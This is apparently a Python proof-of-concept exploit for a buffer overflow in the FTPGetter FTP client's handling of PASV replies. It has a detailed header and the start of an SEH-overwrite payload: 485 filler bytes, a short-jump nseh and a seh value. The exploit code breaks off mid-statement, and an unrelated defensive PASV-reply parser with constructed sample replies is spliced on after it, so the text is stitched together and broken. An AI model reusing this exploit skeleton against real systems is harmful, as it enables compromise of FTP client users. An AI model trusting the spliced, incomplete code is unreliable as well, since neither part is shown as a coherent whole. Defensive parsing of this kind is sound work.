#!/usr/bin/python
# Exploit Title: FTPGetter v3.58.0.21 Buffer Overflow (PASV) Exploit
# Date: 02/03/2011
# Author: modpr0be
# Software Link: http://www.ftpgetter.com/ftpgetter_setup.exe
# Vulnerable version: <= 3.58.0.21
# Tested on: Windows XP SP3 (VMware Player 3.1.3 build-324285)
# CVE : N/A
# ======================================================================
# http://www.digital-echidna.org
# ======================================================================
#
# Greetz:
# say hello to all digital-echidna org crew:
# otoy, cipherstring, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix
# special thx:
# otoy, cipherstring, cyb3r.anbu, oebaj.
# help for documentation:
# offsec, exploit-db, corelan-team, 5M7X, loneferret.
#
#### Software description:
# Save time on FTP/SFTP updates! Plan your uploads and automate the workflow.
# Schedule and automate file transfers with a centralized console. Let your
# computer move or synchronize information securely between home and office
# automatically according to the schedule!
#
#### Exploit information:
# There was an error when sending a response to the PASV command.
# Fortunately, these errors lead to buffer overflows.
# This exploit is unstable. It should only be used as a POC.
# I tried several times on various systems,
# the buffer sometimes changed.
#
### Some Conditions:
# This POC is using "the most selling feature" Automated FTP Request.
# So this POC, I use Auto Download with / as the Source Files.
# Scheduler Settings also set to Repetitive.
# Make sure to run the program first before this POC.
#
#### Other information:
# It's a part of "Death of an FTP Client" :)
# For more information, look here:
# http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
#
##
from socket import *
import struct
import time

total = 1000
junk1 = "\x41" * 485
nseh = "\xeb\x06\x90\x90"
seh = struct.pack('
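
The defensive counterpart to the PASV-response bug described in the header, as an added example that is not part of the original exploit or of FTPGetter's code: a strict client-side parser for 227 replies that checks the line length before anything is parsed or copied. It assumes the overflow is reached through an over-long reply line; the 512-byte cap, the function names and the sample replies are all constructed for illustration.

```python
import re

MAX_REPLY_LEN = 512  # assumed cap for one control-channel reply line
# Exactly six decimal fields in parentheses: (h1,h2,h3,h4,p1,p2)
_PASV_RE = re.compile(rb"\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)")


class PasvReplyError(ValueError):
    """Raised when a 227 reply is oversized or malformed."""


def parse_pasv_reply(line: bytes):
    """Return (host, port) from a '227 ...' reply, or raise PasvReplyError."""
    # Length is checked first, before any parsing or copying takes place.
    if len(line) > MAX_REPLY_LEN:
        raise PasvReplyError("reply too long: %d bytes" % len(line))
    if not line.startswith(b"227 "):
        raise PasvReplyError("not a 227 reply")
    if not line.endswith(b"\r\n"):
        raise PasvReplyError("unterminated reply")
    m = _PASV_RE.search(line)
    if m is None:
        raise PasvReplyError("no (h1,h2,h3,h4,p1,p2) tuple")
    fields = [int(g) for g in m.groups()]
    if any(f > 255 for f in fields):
        raise PasvReplyError("field out of range")
    host = ".".join(str(f) for f in fields[:4])
    port = fields[4] * 256 + fields[5]
    if port == 0:
        raise PasvReplyError("port 0")
    return host, port


def triage(replies):
    """Classify replies the way a client or proxy would before logging them."""
    out = []
    for r in replies:
        try:
            out.append(("ok", parse_pasv_reply(r)))
        except PasvReplyError as e:
            out.append(("rejected", str(e)))
    return out

# Constructed sample replies (not captured traffic).
SAMPLES = [
    b"227 Entering Passive Mode (192,168,1,10,19,137)\r\n",
    b"227 " + b"A" * 1000 + b"\r\n",
    b"227 Entering Passive Mode (192,168,1,999,19,137)\r\n",
]
```

Calling `triage(SAMPLES)` accepts the first reply and rejects the oversized and out-of-range ones with a reason that can be logged.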